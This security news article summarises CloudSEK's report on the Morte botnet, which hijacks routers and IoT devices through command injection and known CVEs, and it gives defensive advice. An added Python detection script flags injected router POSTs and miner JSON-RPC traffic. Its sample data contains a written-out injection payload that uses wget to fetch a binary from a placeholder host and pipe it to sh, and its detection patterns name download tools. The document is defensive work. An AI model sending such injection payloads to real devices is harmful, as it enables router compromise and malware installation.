Morte Botnet Unveiled: A Loader-as-a-Service Campaign Hijacking Routers and IoT Devices

CloudSEK researchers have reported a large-scale campaign leveraging a Loader-as-a-Service botnet, which over the past six months has transformed home routers and IoT devices into engines for cryptocurrency mining and Mirai-style attacks. An analysis of leaked command-and-control server logs revealed the full attack chain — from breaching admin panels to deploying multi-architecture binaries and exploiting compromised devices.

The attackers employ a combination of techniques: command injection through unvalidated POST parameters (in fields such as ntp, syslog, and hostname), brute-forcing default credentials, and exploiting vulnerabilities in enterprise and CMS platforms. Targets included Oracle WebLogic, WordPress, and vBulletin, with attackers leveraging known flaws such as CVE-2019-17574, CVE-2019-16759, and CVE-2012-1823. In the enterprise segment, exploitation attempts focused on WebLogic deserialization, Struts2 OGNL injection, and JNDI exploits.

According to CloudSEK, attack intensity surged by 230% in July and August 2025. Infected devices were seeded with multi-architecture executables from the Morte family, JSON-RPC miners, and Mirai-like bots. These assets were later weaponized for DDoS campaigns, covert mining, and resale of access credentials.

The leaked panel logs revealed the attackers’ structured methodology. Blocks such as [ReplyPageLogin] tracked brute-force credential attempts; [ConfigSystemCommand] and [SystemCommand] issued commands to download droppers via wget, busybox, and TFTP/FTP chains; [ReplyErrorPage] and [ReplySuccessPage] monitored failures or successful execution; while [ReplyDeviceInfo] collected details on firmware, MAC addresses, and available services. This intelligence enabled attackers to tailor payloads precisely for each target device.

The investigation confirmed that the primary focus was on SOHO routers with vulnerable interfaces such as wlwps.htm and wan_dyna.html, as well as embedded Linux systems where binaries like morte.x86 and morte.x86_64 were deployed. The reliance on HTTP, FTP, and TFTP protocols for payload delivery further enhances the botnet’s resilience and adaptability.

The campaign’s impact is multi-layered. For enterprises, it introduces risks of data exfiltration, lateral movement, and secondary threats including ransomware. Corporate routers face threats of network saturation, NTP tampering, and DNS manipulation. Small businesses and ISPs, meanwhile, often find their infrastructure repurposed as a launchpad for larger-scale attacks, resulting in network degradation, increased incident response workloads, and a constant need to track new attack vectors.

CloudSEK recommends a multi-layered defense strategy: blocking outbound HTTP, HTTPS, FTP, and TFTP traffic from IoT segments; isolating devices exhibiting suspicious POST-parameter manipulation; updating firmware and credentials; and disabling remote administration.

For SOC and SIEM teams, detection rules should flag suspicious requests involving wget, curl, or |sh executions, as well as anomalous JSON-RPC connections. In response workflows, infected devices must be isolated, forensic artifacts such as logs and /tmp contents collected, and where updates are impossible, devices should be fully reflashed or replaced.
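The following script is an added example (not CloudSEK's code or any tooling from the report) of what the detection rules described above, and the isolation criterion from the defense recommendations, can look like when run over router-panel request records. It flags POST bodies where the ntp, syslog, or hostname fields carry shell metacharacters, wget/curl/busybox/tftp references, or a pipe into sh, and it flags JSON-RPC calls originating inside the IoT segment. The IoT subnet (192.168.50.0/24), the record format, and the sample records are all constructed for illustration; the dropper host in the sample is a placeholder.

```python
import ipaddress
import json
import re
from urllib.parse import unquote_plus

# Assumption: the IoT/SOHO router segment is 192.168.50.0/24 (placeholder; adjust to your network).
IOT_SEGMENT = ipaddress.ip_network("192.168.50.0/24")

# POST parameters the report names as injection points on router admin panels.
INJECTABLE_PARAMS = {"ntp", "syslog", "hostname"}
# Router pages the report names as targeted interfaces.
TARGETED_PAGES = {"/wlwps.htm", "/wan_dyna.html"}

DOWNLOAD_TOOL_RE = re.compile(r"\b(wget|curl|tftp|busybox)\b", re.I)
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sh|bash)\b")
SHELL_META_RE = re.compile(r"[;`$|&]")


def parse_form(body):
    """Split an application/x-www-form-urlencoded body into (name, value) pairs."""
    pairs = []
    for field in body.split("&"):
        if not field:
            continue
        name, _, value = field.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def inspect_form_post(path, body):
    """Return the reasons a POST to a router admin page looks like command injection."""
    reasons = []
    for name, value in parse_form(body):
        if name in INJECTABLE_PARAMS and SHELL_META_RE.search(value):
            reasons.append(f"shell metacharacter in '{name}'")
        if DOWNLOAD_TOOL_RE.search(value):
            reasons.append(f"download tool referenced in '{name}'")
        if PIPE_TO_SHELL_RE.search(value):
            reasons.append(f"pipe-to-shell in '{name}'")
    # Only escalate on page name when the body already looks malicious, to keep noise down.
    if reasons and path in TARGETED_PAGES:
        reasons.append(f"targets known-abused page {path}")
    return reasons


def inspect_jsonrpc(src, body):
    """Flag JSON-RPC calls originating inside the IoT segment (miner-style check-ins)."""
    try:
        msg = json.loads(body)
    except ValueError:
        return []
    if not isinstance(msg, dict) or "method" not in msg:
        return []
    if ipaddress.ip_address(src) in IOT_SEGMENT:
        return [f"JSON-RPC call '{msg['method']}' from IoT host {src}"]
    return []


def detect(records):
    """Run both checks over a list of {"src", "path", "body"} records; return alerts for isolation."""
    alerts = []
    for rec in records:
        reasons = inspect_form_post(rec["path"], rec["body"]) + inspect_jsonrpc(rec["src"], rec["body"])
        if reasons:
            alerts.append({"src": rec["src"], "path": rec["path"], "reasons": reasons})
    return alerts


# Constructed sample records (not real traffic); dropper.invalid is a placeholder host.
SAMPLE_RECORDS = [
    {"src": "203.0.113.7", "path": "/wan_dyna.html",
     "body": "hostname=%3Bwget+http%3A%2F%2Fdropper.invalid%2Fmorte.x86+-O+%2Ftmp%2Fm%7Csh"},
    {"src": "203.0.113.7", "path": "/wlwps.htm", "body": "ntp=pool.ntp.org&syslog=192.168.50.1"},
    {"src": "192.168.50.23", "path": "/", "body": '{"jsonrpc":"2.0","method":"login","id":1}'},
    {"src": "192.168.50.24", "path": "/status", "body": "page=1"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_RECORDS):
        print(alert)
```

On the constructed records this produces two alerts: the injection attempt against wan_dyna.html (four reasons, including the pipe into sh) and the JSON-RPC login from the IoT host; the benign configuration POST and the status request are left alone. The source addresses in the alerts are the candidates for the isolation step described above.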

CloudSEK forecasts the continued evolution of this infrastructure, with a growing set of targeted devices and increasingly sophisticated malicious modules. In their assessment, only systematic oversight and rapid response can mitigate the risks posed by this new service-based botnet model.